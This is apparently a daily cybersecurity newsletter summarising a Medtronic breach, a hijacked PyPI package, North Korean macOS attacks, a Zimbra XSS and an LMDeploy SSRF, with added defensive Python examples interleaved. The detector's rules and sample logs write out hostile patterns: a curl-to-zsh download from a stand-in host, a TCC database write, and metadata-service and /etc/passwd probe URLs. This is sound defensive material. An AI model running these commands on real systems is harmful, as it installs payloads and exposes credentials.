
☀️ Good morning. Here's everything that happened in cybersecurity yesterday — in under 5 minutes.

ShinyHunters claims 9 million records from medical device giant Medtronic, a Python package downloaded 1.1 million times a month was hijacked to push an infostealer directly into developer CI/CD pipelines, North Korean state actors are now weaponizing macOS's own scripting tools to steal crypto wallets, 10,500 Zimbra email servers remain exposed to an actively exploited zero-click XSS that CISA flagged weeks ago, and an AI inference engine was exploited within 12 hours of its vulnerability being disclosed.

🔥 Top Stories

01 — ShinyHunters Claims 9 Million Medtronic Records — The Medical Device Giant Confirms the Breach

Data Breaches

Medtronic — the global leader in cardiac devices, insulin pumps, and surgical robotics used in hospitals worldwide — has confirmed via SEC 8-K filing that an unauthorized party accessed its corporate IT systems. ShinyHunters claims to have exfiltrated terabytes of data including over 9 million PII records. Medtronic's network segmentation appears to have held — product control and manufacturing networks show no evidence of compromise — but the corporate side is confirmed breached.

ShinyHunters' pattern here is textbook: public leak site listing, brief removal suggesting active negotiations or private sale, SEC disclosure forced by the extortion threat. This is the group's fourth confirmed major target in April alone — ADT, Udemy, and now Medtronic all in the same week. The question isn't whether the corporate-to-clinical air gap held this time. It's how long corporate healthcare data remains separate from patient outcomes when attackers have nine million PII records to use for targeted spear-phishing against hospital procurement teams, R&D staff, and clinical partners.

02 — A PyPI Package with 1.1 Million Monthly Downloads Was Hijacked to Push an Infostealer

Supply Chain Attack

On April 21, attackers compromised a PyPI package maintainer's account and pushed a malicious update to a utility library that pulls over 1.1 million downloads per month. Any developer or build server that ran pip install --upgrade between April 21-23 automatically pulled the W4SP Stealer — a Windows infostealer that harvests browser passwords, SSH keys, AWS credentials, .gitconfig files, and Discord/Telegram tokens. Because the payload ran via setup.py install hooks, it executed immediately with the permissions of whoever ran the install command.

The 48-hour exposure window is the critical detail. In enterprise environments with automated CI/CD pipelines, pip upgrade runs without human intervention. Thousands of build servers may have silently compromised themselves before PyPI pulled the package. Any machine that pulled the update must be treated as fully compromised and re-imaged — W4SP is persistent and cannot be removed by simply reverting the package. SSH keys and cloud credentials that existed on those hosts during the window must be rotated immediately.
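The silent-upgrade path described above only works when a build's dependencies are loosely specified. The following is an added example, not code from the newsletter, from PyPI, or from the hijacked project: it parses a requirements file in pip's own `--hash=` format, reports every entry that `pip install --upgrade` could move to a different artifact, and performs the same digest comparison that `pip install --require-hashes` does on a downloaded wheel. The package names, the requirements text, and the "wheel" bytes are constructed sample data.

```python
"""Audit a pip requirements file for entries that pip may silently upgrade.

Added illustration for the PyPI hijack item above; not code from PyPI or the
newsletter. SAMPLE_REQUIREMENTS and GOOD_ARTIFACT are constructed data.
"""
import hashlib
import re
from dataclasses import dataclass, field

# Requirement line: name, optional [extras], optional version specifier.
_REQ_RE = re.compile(r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)(\[[^\]]*\])?\s*([=<>!~]=?[^\s\\]*)?")
# Zero or more "--hash=algo:hexdigest" options may follow on the same logical line.
_HASH_RE = re.compile(r"--hash=([a-z0-9]+):([0-9a-fA-F]+)")


@dataclass
class Requirement:
    name: str
    specifier: str
    hashes: dict = field(default_factory=dict)  # algorithm -> {accepted digests}

    @property
    def exact_pin(self) -> bool:
        return self.specifier.startswith("==")

    @property
    def hash_pinned(self) -> bool:
        return bool(self.hashes)


def _logical_lines(text: str):
    """Strip comments and join pip's backslash continuations into single lines."""
    buf = ""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        buf += line
        if buf.strip():
            yield buf
        buf = ""
    if buf.strip():
        yield buf


def parse_requirements(text: str) -> list:
    reqs = []
    for line in _logical_lines(text):
        if line.lstrip().startswith("-"):  # option lines such as -r or --index-url
            continue
        m = _REQ_RE.match(line)
        if not m:
            continue
        req = Requirement(name=m.group(1).lower(), specifier=(m.group(3) or "").strip())
        for algo, digest in _HASH_RE.findall(line):
            req.hashes.setdefault(algo, set()).add(digest.lower())
        reqs.append(req)
    return reqs


def audit(text: str) -> dict:
    """Return {package: reason} for every entry that can change without a human edit."""
    findings = {}
    for req in parse_requirements(text):
        if not req.exact_pin:
            findings[req.name] = "no exact version pin; --upgrade takes the newest release"
        elif not req.hash_pinned:
            findings[req.name] = "version pinned but no --hash; a re-uploaded artifact would pass"
    return findings


def artifact_matches(req: Requirement, artifact: bytes) -> bool:
    """Accept a downloaded wheel/sdist only if its digest is one the lockfile lists."""
    for algo, digests in req.hashes.items():
        if hashlib.new(algo, artifact).hexdigest() in digests:
            return True
    return False


# Constructed sample: pretend these bytes are the wheel that was reviewed and locked.
GOOD_ARTIFACT = b"constructed wheel contents for the example"
GOOD_DIGEST = hashlib.sha256(GOOD_ARTIFACT).hexdigest()

SAMPLE_REQUIREMENTS = f"""\
# constructed sample lockfile
requests==2.31.0 \\
    --hash=sha256:{GOOD_DIGEST}
someutil>=1.4           # unpinned: any newer upload, malicious or not, is accepted
othertool==3.2.1        # pinned, but a re-uploaded 3.2.1 would still be accepted
"""

if __name__ == "__main__":
    for name, reason in audit(SAMPLE_REQUIREMENTS).items():
        print(f"{name}: {reason}")
    locked = {r.name: r for r in parse_requirements(SAMPLE_REQUIREMENTS)}
    print("requests artifact ok:", artifact_matches(locked["requests"], GOOD_ARTIFACT))
    print("tampered artifact ok:", artifact_matches(locked["requests"], GOOD_ARTIFACT + b"!"))
```

Hash pinning closes the "pulled a different artifact" path but does not by itself stop `setup.py` from running; pip's `--only-binary :all:` refuses source distributions, so an install consists of unpacking a wheel and no package code executes at install time. Together the two options turn the 48-hour window above into a build failure rather than a silent compromise.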

03 — North Korea Is Now Using macOS's Own Scripts to Steal Crypto Wallets

Nation-State Threats

Microsoft and Mandiant have confirmed that Sapphire Sleet (APT38) and UNC1069 — North Korean threat actors previously focused on Windows — have developed dedicated macOS attack chains targeting crypto, fintech, and healthcare professionals. The approach: fake recruitment calls and video meeting "technical issues" that prompt victims to run malicious AppleScript files or paste Terminal commands. No exploit required. The user authorizes the infection themselves.

The AppleScript variant modifies macOS's TCC database to silently grant itself Full Disk Access — bypassing Gatekeeper and notarization entirely because the user ran the script manually. The Terminal variant downloads a Mach-O binary via curl | zsh that targets browser sessions, crypto wallet seeds, and Apple Keychain. North Korea is simultaneously poisoning the broader npm ecosystem — the axios package was recently seeded with the WAVESHAKER backdoor to hit developers who never clicked anything. Two tracks, same objective: drain crypto infrastructure to fund the weapons program.
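Because both variants rely on built-in macOS tooling rather than an exploit, the detection opportunity is in process execution telemetry. The following is an added example, not code from Microsoft, Mandiant, or the newsletter: a small rule set run over constructed process-execution records that flags the three patterns the item describes (a shell fed directly from curl, AppleScript launched from a download or temp location, and a direct write to the TCC database). The record format `<timestamp> user=<u> parent=<p> cmd=<command line>` and every log line below are constructed for the example.

```python
"""Flag macOS living-off-the-land patterns in process-execution records.

Added illustration for the Sapphire Sleet / UNC1069 item above; not code from
Microsoft, Mandiant or the newsletter. The record layout and SAMPLE_LOG are
constructed sample data.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    line: str


# (rule name, pattern applied to the command line, what it indicates)
RULES = [
    ("curl_piped_to_shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(zsh|bash|sh)\b"),
     "remote content fed straight into a shell"),
    ("osascript_from_user_writable_path",
     re.compile(r"\bosascript\b.*(/Downloads/|/tmp/|/private/tmp/|/Desktop/)\S*\.(scpt|applescript|js)\b"),
     "AppleScript/JXA run from a download or temp location"),
    ("osascript_inline",
     re.compile(r"\bosascript\s+-e\b"),
     "inline AppleScript passed on the command line"),
    ("tcc_db_tamper",
     re.compile(r"\bsqlite3\b.*com\.apple\.TCC/TCC\.db"),
     "direct write to the TCC privacy database (user or system copy)"),
]

_CMD_RE = re.compile(r"\bcmd=(.*)$")


def scan(lines):
    """Return one Finding per (rule, line) match, in log order."""
    findings = []
    for line in lines:
        m = _CMD_RE.search(line)
        if not m:
            continue  # not a process record; ignore
        cmd = m.group(1)
        for name, pattern, _why in RULES:
            if pattern.search(cmd):
                findings.append(Finding(name, line))
    return findings


def rules_by_line(lines):
    """Map each flagged line to the set of rule names that fired on it."""
    out = {}
    for f in scan(lines):
        out.setdefault(f.line, set()).add(f.rule)
    return out


# Constructed records: the first three mimic the chain described above, the
# last two are benign look-alikes that must not fire.
SAMPLE_LOG = [
    "2026-04-22T09:14:03Z user=alice parent=zoom.us cmd=/usr/bin/osascript /Users/alice/Downloads/fix_audio.scpt",
    "2026-04-22T09:14:05Z user=alice parent=Terminal cmd=/bin/zsh -c 'curl -fsSL https://example.invalid/setup | zsh'",
    '2026-04-22T09:14:09Z user=alice parent=zsh cmd=sqlite3 "/Users/alice/Library/Application Support/com.apple.TCC/TCC.db" "insert into access ..."',
    "2026-04-22T09:20:00Z user=alice parent=Terminal cmd=curl -fsSL https://example.invalid/file.tgz -o /tmp/file.tgz",
    "2026-04-22T09:21:00Z user=bob parent=Finder cmd=/usr/bin/osascript /Applications/Utilities/backup.scpt",
]

if __name__ == "__main__":
    for line, rules in rules_by_line(SAMPLE_LOG).items():
        print(sorted(rules), "<-", line)
```

The inline-`osascript -e` rule is noisy on developer and IT-administered machines and is best used as context for the other three rather than an alert on its own; the TCC rule matches both the per-user database under `~/Library/Application Support/com.apple.TCC/` and the system copy under `/Library/Application Support/com.apple.TCC/`. Parent-process context (a video-conferencing client spawning `osascript`, as in the first constructed record) is the strongest signal for the recruitment-call lure.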

04 — 10,500 Zimbra Email Servers Are Exposed to an Actively Exploited Zero-Click XSS

Vulnerabilities

CVE-2025-48700 — a stored XSS flaw in Zimbra Collaboration Suite — was patched in June 2025. Ten months later, Shadowserver data shows 10,500+ servers still running vulnerable versions (8.8.15, 9.0, 10.0, 10.1), with the highest concentrations in Asia (3,794) and Europe (3,793). CISA added the flaw to the KEV catalog on April 21 and gave federal agencies a three-day patch window. The attack vector: send a crafted email. When the victim opens it, the payload executes automatically in their active session. Zero clicks required.

Session hijacking, email exfiltration, account takeover, and — if the victim is an admin — lateral movement across the entire Zimbra instance. The UAC-0233 threat group has been observed actively exploiting this against Ukrainian targets. The patch has existed for ten months. The 10,500 exposed servers represent a systematic failure of patch hygiene on legacy email infrastructure — mail servers treated as appliances rather than attack surfaces. CISA's three-day federal mandate is a signal the private sector should treat as their own deadline.

05 — An AI Inference Engine Was Exploited 12 Hours After Its Vulnerability Was Published

Artificial Intelligence

CVE-2026-33626 — a CVSS 7.5 Server-Side Request Forgery flaw in LMDeploy, the open-source AI inference toolkit — was disclosed via GitHub Security Advisory on April 22. Sysdig observed the first exploitation attempt 12 hours and 31 minutes later, originating from an IP in Kowloon Bay, Hong Kong. No public proof-of-concept existed. The attacker reverse-engineered the advisory text into a working exploit and within 8 minutes had confirmed SSRF reachability, stolen AWS IMDS credentials, and swept internal ports for Redis, MySQL, and admin dashboards.

The attack works because LMDeploy's vision-language module fetches external image URLs for model processing — an AI feature that becomes an SSRF primitive when pointed at internal addresses. AI inference engines are deployed with rich network access by design. They trust internal infrastructure. They're internet-facing by function. And their security is treated as an afterthought. Patch to v0.12.3 immediately. If you're on AWS, enforce IMDSv2 with hop limit 1. Twelve hours is no longer a grace period.
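The feature-turned-primitive described above is a URL fetch that never checks where the URL points. The following is an added example, not LMDeploy's code or its fix: a validator that a server-side image fetcher can call before connecting, accepting only `http(s)` URLs whose every resolved address is public, with the cloud metadata address (169.254.169.254, link-local) and the RFC 1918, loopback, and IPv6 equivalents refused. The resolver is injected so the example runs offline; `SAMPLE_RESOLVER`, its hostnames, and its addresses are constructed.

```python
"""Validate an untrusted image URL before a server-side fetch.

Added illustration for the LMDeploy SSRF item above; not code from LMDeploy or
the newsletter. SAMPLE_RESOLVER and its hostnames/addresses are constructed.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

# Ranges a fetch of an untrusted URL must never reach. 169.254.169.254 (IMDS)
# falls inside the link-local block.
_BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16",
    "224.0.0.0/4", "240.0.0.0/4",
    "::/128", "::1/128", "fc00::/7", "fe80::/10",
)]


def _is_blocked(ip) -> bool:
    # Unwrap IPv4-mapped IPv6 (::ffff:10.0.0.5) so the IPv4 ranges apply to it.
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return any(ip in net for net in _BLOCKED_NETWORKS)


def default_resolver(host):
    """Resolve every A/AAAA answer; one public address among private ones is not enough."""
    return {ipaddress.ip_address(info[4][0]) for info in socket.getaddrinfo(host, None)}


def check_image_url(url, resolver=default_resolver):
    """Return (ok, reason). ok is True only for http(s) URLs whose addresses are all public."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    if not parts.hostname:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in URL not allowed"
    host = parts.hostname
    try:
        addrs = {ipaddress.ip_address(host)}  # literal IP, including bracketed IPv6
    except ValueError:
        try:
            addrs = resolver(host)
        except OSError as exc:
            return False, f"resolution failed: {exc}"
    if not addrs:
        return False, "host resolved to no addresses"
    for ip in addrs:
        if _is_blocked(ip):
            return False, f"{host} resolves to non-public address {ip}"
    return True, "ok"


def SAMPLE_RESOLVER(host):
    """Constructed DNS table so the example runs without network access."""
    table = {
        "images.example": {ipaddress.ip_address("203.0.113.7")},
        "localhost": {ipaddress.ip_address("127.0.0.1")},
        "dual.example": {ipaddress.ip_address("203.0.113.8"), ipaddress.ip_address("10.0.0.5")},
    }
    if host not in table:
        raise socket.gaierror(f"constructed resolver has no entry for {host}")
    return table[host]


if __name__ == "__main__":
    for candidate in (
        "https://images.example/cat.png",
        "http://169.254.169.254/latest/meta-data/",
        "http://localhost:6379/",
        "http://dual.example/x.png",
        "http://[::ffff:10.0.0.5]/",
        "file:///etc/passwd",
    ):
        print(candidate, "->", check_image_url(candidate, SAMPLE_RESOLVER))
```

Two caveats follow from how the check is used. The fetch must connect to the address that was validated (pass the resolved IP to the HTTP client and set the Host header yourself) rather than resolving the name a second time, otherwise a DNS answer that changes between check and fetch defeats it; and every redirect target has to go through `check_image_url` again. On AWS the IMDSv2 hop-limit-1 setting the item recommends is the complementary control on the metadata side, so that a request relayed through an application container cannot reach the service even if a validator is missing.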

📊 By The Numbers

  • 9M — Records ShinyHunters claims to have stolen from Medtronic — breach confirmed via SEC 8-K

  • 1.1M — Monthly downloads of the PyPI package hijacked to push W4SP Stealer

  • 10,500+ — Zimbra servers still exposed to a vulnerability patched ten months ago

  • 12 hours, 31 minutes — Time between CVE-2026-33626 disclosure and first confirmed exploitation

  • 4 — Major ShinyHunters breach disclosures in April 2026 alone: ADT, Udemy, Medtronic, and more

⚡ The Signal

Today's top stories describe the full attack surface of 2026 in a single briefing.

The supply chain attack hit developers through a trusted package they never thought to question. The nation-state attack bypassed macOS security by asking users to run things themselves. The Zimbra attack triggers automatically when an email is opened. The AI exploit required reading a GitHub advisory and writing code — no PoC needed. The Medtronic breach forced disclosure through public extortion rather than internal discovery.

In each case the attack used something trusted — a popular package, a macOS script, an inbox, an AI endpoint, a threat actor's leak site — to achieve something catastrophic. The window between disclosure and exploitation is now measured in hours. The assumption that a "legacy mail server" doesn't need immediate patching is wrong. The assumption that macOS is inherently safe is wrong. The assumption that your AI infrastructure is not a network attack surface is wrong.

Everything is the attack surface. Everything.

📅 What to Watch

  • Medtronic forensic results — full scope of the breach still under investigation; watch for updated SEC filings and whether the 9M figure is confirmed or revised.

  • PyPI W4SP Stealer fallout — 48-hour exposure window means compromised CI/CD pipelines may not surface for weeks; watch for enterprise credential incidents tied to the April 21-23 window.

  • Zimbra patch uptake — 10,500 exposed servers after ten months suggests organizational resistance; watch for CISA escalating enforcement beyond the federal civilian deadline.

  • LMDeploy exploitation expansion — initial attacker originated from Hong Kong; watch for broader scanning campaigns as secondary actors adopt the same advisory-to-exploit workflow.

Stay sharp. Stay ahead.

Till next time,

The CyberSignal Team

Our Sponsor

Fast browsing. Faster thinking.

Your browser gets you to a page. Norton Neo gets you to the answer. The first safe AI-native browser built by Norton moves with you from idea to action without slowing you down. Magic Box understands your intent before you finish typing. AI that works inside your flow, not beside it. No prompting. No copy-pasting. No switching apps.

Built-in AI, instantly and for free. Privacy handled by Norton. Built-in VPN and ad blocking protect you by default. No configuration. No extra apps. Nothing to think about.

Fast. Safe. Intelligent. That's Neo.
